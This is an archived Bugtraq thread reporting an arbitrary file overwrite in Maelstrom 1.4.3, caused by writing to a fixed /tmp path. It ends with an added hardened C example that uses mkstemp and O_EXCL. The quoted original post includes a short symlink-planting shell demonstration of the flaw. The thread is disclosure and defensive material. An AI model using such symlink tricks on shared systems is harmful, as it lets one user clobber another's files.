Bugtraq mailing list archives
Re: Maelstrom 1.4.3 arbitrary file overwrite
From: Chris Gragsone <maetrics () realwarp net>
Date: Mon, 21 Jan 2002 11:26:43 -0500
You should also note that Maelstrom doesn't check the return of fopen(), nor does it remove the file when it closes. If you have multiple users who run Maelstrom, or just someone who wants to break stuff, and /tmp/f is owned by another user or its permissions are set to non-writable, Maelstrom will segfault when it passes 0 as the file stream to fprintf().

--chris

Andrew Griffiths wrote:

> Program: Maelstrom
> Version: 1.4.3
> Distribution: RedHat 7.1
>
> When trying to break stuff, ltracing Maelstrom showed the following:
>
> fopen("/tmp/f", "w") = 0x08081f58
> fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
> fclose(0x08081f58) = 0
>
> Which made me wonder if it followed symbolic links, by doing
>
> [andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla > /tmp/bla; \
> ln -s /tmp/bla f)
>
> at which point I ran it again, and when I did cat /tmp/bla, I got
>
> Main program = Maelstrom
>
> Conclusion:
> -=-=-=-=-=-
> You can overwrite arbitrary files with the permissions of the user who ran
> it. Of course, this won't work on systems that have linking restrictions in
> /tmp.
>
> Fixing it
> -=-=-=-=-
> Remove the code that does the above.
>
> --
> www.tasmail.com
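The two defects the thread describes, a fixed predictable name in /tmp opened with fopen() that follows whatever is already there, and a return value that is never checked before fprintf(), have one standard fix: create the file with O_CREAT|O_EXCL semantics under a random name (mkstemp()), check every call, and remove the file when done. The following is an added example written for this page; it is not Maelstrom's source and not the fix the poster shipped. The function names write_debug_safe, open_fixed_path_noclobber and read_small_file, the "maelstrom-XXXXXX" template and the /tmp directory used in main are this example's own choices.

```c
#define _GNU_SOURCE              /* for O_NOFOLLOW / mkstemp on older glibc */
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hardened replacement for fopen("/tmp/f", "w").
 * mkstemp() picks a random name and opens it with O_CREAT|O_EXCL and mode
 * 0600, so the call fails instead of writing through a link someone left at
 * a predictable path. Every return value is checked: a failure yields -1
 * rather than a NULL FILE* handed to fprintf() (the segfault Chris notes).
 * On success the created path is copied to out_path so the caller can
 * unlink it afterwards. Names here are the example's own. */
int write_debug_safe(const char *dir, const char *program,
                     char *out_path, size_t out_len)
{
    char template[PATH_MAX];
    int n = snprintf(template, sizeof template, "%s/maelstrom-XXXXXX", dir);
    if (n < 0 || (size_t)n >= sizeof template)
        return -1;

    int fd = mkstemp(template);              /* O_CREAT|O_EXCL, 0600 */
    if (fd == -1)
        return -1;

    FILE *fp = fdopen(fd, "w");
    if (fp == NULL) {                         /* the check the original lacks */
        close(fd);
        unlink(template);
        return -1;
    }
    if (fprintf(fp, "Main program = %s\n", program) < 0 || fclose(fp) != 0) {
        unlink(template);
        return -1;
    }
    if (strlen(template) >= out_len) {
        unlink(template);
        return -1;
    }
    strcpy(out_path, template);
    return 0;
}

/* If the name really must be fixed, refuse to create through anything that
 * already exists there: with O_CREAT|O_EXCL, open() fails with EEXIST when
 * path names a file or a symlink (dangling or not), and O_NOFOLLOW refuses
 * a symlink even when nothing would be created. Returns an fd or -1. */
int open_fixed_path_noclobber(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Read a small file back so the written content can be checked.
 * Returns the number of bytes read, or -1 if the file could not be opened. */
long read_small_file(const char *path, char *buf, size_t len)
{
    FILE *fp = fopen(path, "r");
    if (fp == NULL)
        return -1;
    size_t got = fread(buf, 1, len - 1, fp);
    fclose(fp);
    buf[got] = '\0';
    return (long)got;
}

int main(void)
{
    char path[PATH_MAX], buf[64];
    if (write_debug_safe("/tmp", "Maelstrom", path, sizeof path) != 0) {
        perror("write_debug_safe");
        return 1;
    }
    read_small_file(path, buf, sizeof buf);
    printf("%s contains: %s", path, buf);
    unlink(path);                             /* remove the file when done */
    return 0;
}
```

The written line is the same 25 bytes the ltrace output shows, so the only behavioural change is where the file lives, who can open it, and what happens when the open fails.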
Current thread:
- Maelstrom 1.4.3 arbitrary file overwrite Andrew Griffiths (Jan 20)
- Re: Maelstrom 1.4.3 arbitrary file overwrite Chris Gragsone (Jan 21)